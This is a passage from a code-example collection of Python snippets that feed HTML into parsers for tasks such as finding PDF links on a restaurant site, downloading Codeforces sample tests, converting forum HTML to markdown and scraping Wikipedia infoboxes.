    """

    # Website aufrufen und html code auslesen
    r = urlopen(_capriUrl + 'lieferservice.html')
    html = r.read().decode("utf-8")

    parser = HTMLParser()
    parser.feed(html)

    links = parser.getLinks()
    print(parser.getLinks())

    # Check all found links
    for link in links:

        # Check for link to pdf file in img folder
        if link.startswith("img/") and link.endswith(".pdf"):
            linkToPdf = _capriUrl + link
            print("Link to pdf:", linkToPdf)
            return linkToPdf

    # No link to pdf found
    return None
Ejemplo n.º 46
0
def download_problem(contest_uri, problem):
    problem_uri = contest_uri + '/problem/' + problem
    print('Retrieving', problem_uri, '...')
    sys.stdout.flush()
    problem_html = urllib.request.urlopen(problem_uri).read().decode('utf-8')
    print('Retrieved problem {} ({} bytes).'.format(problem,
                                                    len(problem_html)))

    # Hack for codeforces HTML errors
    problem_html = problem_html.replace('<p</p>', '<p></p>')
    problem_html = problem_html.replace('<ul</ul>', '<ul></ul>')
    problem_html = problem_html.replace('<div class="sample-test"<',
                                        '<div class="sample-test"><')

    parser = ProblemHTMLParser()
    try:
        parser.feed(problem_html)
    except:
        print(problem_html, file=sys.stderr)
        raise

    examples = parser.getExamples()

    for i, example in enumerate(examples, 1):
        input_path = INPUT_TESTCASE_FORMAT.format(problem=problem, number=i)
        write_example(input_path, example[0])

        output_path = OUTPUT_TESTCASE_FORMAT.format(problem=problem, number=i)
        write_example(output_path, example[1])

    print('Wrote {} examples for problem {}.'.format(len(examples), problem))
Ejemplo n.º 47
0
def html_to_markdown(content, host):
    with open('debug/out', 'w') as f:
        f.write(content)
    parser = guildwars2_html2markdown.Htmlparser()
    parser.convert_charrefs = True
    parser.host = 'https://' + host
    content = content.replace('\n', '\n>')
    parser.feed(content)
    # content = tag_bold(content)
    # content = tag_italic(content)
    # content = tag_list(content)
    # content = tag_superscript(content)
    # content = tag_strikethrough(content)
    # content = tag_underline(content)
    # content = tag_breakrow(content)
    # content = tag_h1(content)
    # content = tag_h2(content)
    # content = tag_h3(content)
    # content = tag_h4(content)
    # content = tag_h5(content)
    # content = tag_h6(content)
    # content = tag_hr(content)
    # content = tag_screenshot(content, host)
    # content = tag_paragraph(content)
    # content = tag_iframe(content, host)
    # content = tag_href(content, host)
    # content = tag_img(content, host)
    # content = tag_quote(content, host)
    # content = tag_spoiler(content, host)
    # content = tag_object(content)
    # content = content.strip('\n')
    # content = '>' + content.replace('\n', '\n>')
    # content = tag_other(content)
    print(parser.result)
    return parser.result
Ejemplo n.º 48
0
 async def __fetch_and_feed(self, client: aiohttp.client.ClientSession, url, parser: htmlParser, client_num: int):
     # logger.debug(f"client - {client_num}, try to get url <{url}>")
     resp: aiohttp.client.ClientResponse
     while True:
         async with client.get(url) as resp:
             if resp.status < 200 or resp.status >= 300:
                 logger.warning(f"server response - {resp.status}")
                 break
             try:
                 html_data = await resp.text()
             except UnicodeDecodeError as err:
                 logger.warning(err)
                 break
             # print(html_data)
             parser.feed(html_data)
             m_v = html_url_regex_3.match(url)
             if m_v is None or m_v.group(4) == "":
                 logger.warning(f"Processing url <{url}> cause an exception, url isn't correspond with content.")
                 break
             PageId = int(m_v.group(4))
             if parser.HasContent and (parser.BookName != "" and parser.BookName is not None):
                 AppendContext(parser.BookName, PageId, parser.Content)
         break
     await self.__client_list.ReleaseClient(client_num)
     return
Ejemplo n.º 49
0
def tag_screenshot(content, host):
    re_sss = re.findall('<p class="screenshot">.*?<\/p>', content)
    for re_ss in re_sss:
        if re_ss != '':
            parser = p_screenshots()
            parser.feed(re_ss)
            content = content.replace(re_ss, parser._src + '\n')
    return content
Ejemplo n.º 50
0
def tag_iframe(content, host):
    re_ifrs = re.findall('<iframe.*?src="[^"]*".*?>.*?<\/iframe>', content)
    for re_ifr in re_ifrs:
        if re_ifr != '':
            parser = p_iframe()
            parser.feed(re_ifr)
            content = content.replace(re_ifr, parser._src)
    return content
Ejemplo n.º 51
0
 def getBuildsFromPage(self, appId, pageIndex):
 	request = urllib.request.Request("https://www.testflightapp.com/dashboard/applications/%d/builds/?page=%d" % (appId, pageIndex + 1))
 	response = self.opener.open(request);
 	htmlContent = response.read().decode('ascii')
 	parser = self.BuildsOnPageParser()
 	parser.feed(htmlContent)
 	print("Found %d builds on page %d" % (len(parser.builds), pageIndex + 1))
 	return parser.builds
Ejemplo n.º 52
0
	def run(self):
		parser = Parser()
		with open(os.path.join('..','docs','docs.polserver.com','pol099','include','escriptguide.inc')) as f:
			while True:
				l = f.readline()
				if not l:
					break
				parser.feed(l)
Ejemplo n.º 53
0
def search(db, terms):
    f = open(db)
    xml = f.readlines()
    f.close()
    parser = BayParser()
    parser.q = (' '.join(terms)).lower()
    parser.feed(''.join(xml))
    return parser.results
Ejemplo n.º 54
0
def parse(company_number: str) -> (str, str, str):
    html = _fetch_company_data(company_number)
    if not html:
        return None

    parser = SummaryParser()
    parser.feed(html)
    return parser.company_status, parser.company_incorporated, parser.company_type
Ejemplo n.º 55
0
def parse(markup):
    parser = Parser()
    parser.feed(markup)

    gen = HtmlGenerator(parser.parse_result)
    try:
        return gen.get_html()
    except CompileException as ex:
        return '<h1>Error</h1><pre>{}</pre>'.format(ex)
Ejemplo n.º 56
0
 def loadPages(self,dir):
     for filename in os.listdir(dir):
         pattern = re.compile(".*\.html")
         parser = self.WordCounter()
         if re.match(pattern,filename):
             file = open(dir+filename,'r')
             parser.feed(file.read())
             file.close()
             self.sitesDict[filename] = parser.wordCount
Ejemplo n.º 57
0
 def to_json(content, raise_exception=True):
     """
     converts HTML into JSON
     @param      content             HTML content to parse
     @param      raise_exception     if True, raises an exception if the HTML is malformed, otherwise does what it can
     """
     parser = HTMLtoJSONParser(raise_exception=raise_exception)
     parser.feed(content)
     return parser.json
Ejemplo n.º 58
0
 def parse_links(self):
     'Parse out the links found in download HTML file'
     f = open(self.file,'r')
     data = f.read()
     f.close()
     parser = html.parser.HTMLParser(formatter.AbstractFormatter(formatter.DumbWriter(io.StringIO())))
     parser.feed(data)
     parser.close
     return parser.anchorlist
Ejemplo n.º 59
0
def scrape(path):
    request = urllib.request.Request('http://en.wikipedia.org' + path)
    request.add_header('User-agent', 'Mozilla/5.0')
    response = urllib.request.urlopen(request, timeout=10)
    parser = Parser()
    parser.feed(response.read().decode())
    return {
        key: value for key, value in parser.__dict__.items() if key in [
            'influenced', 'influenced_by', 'appeared_in']}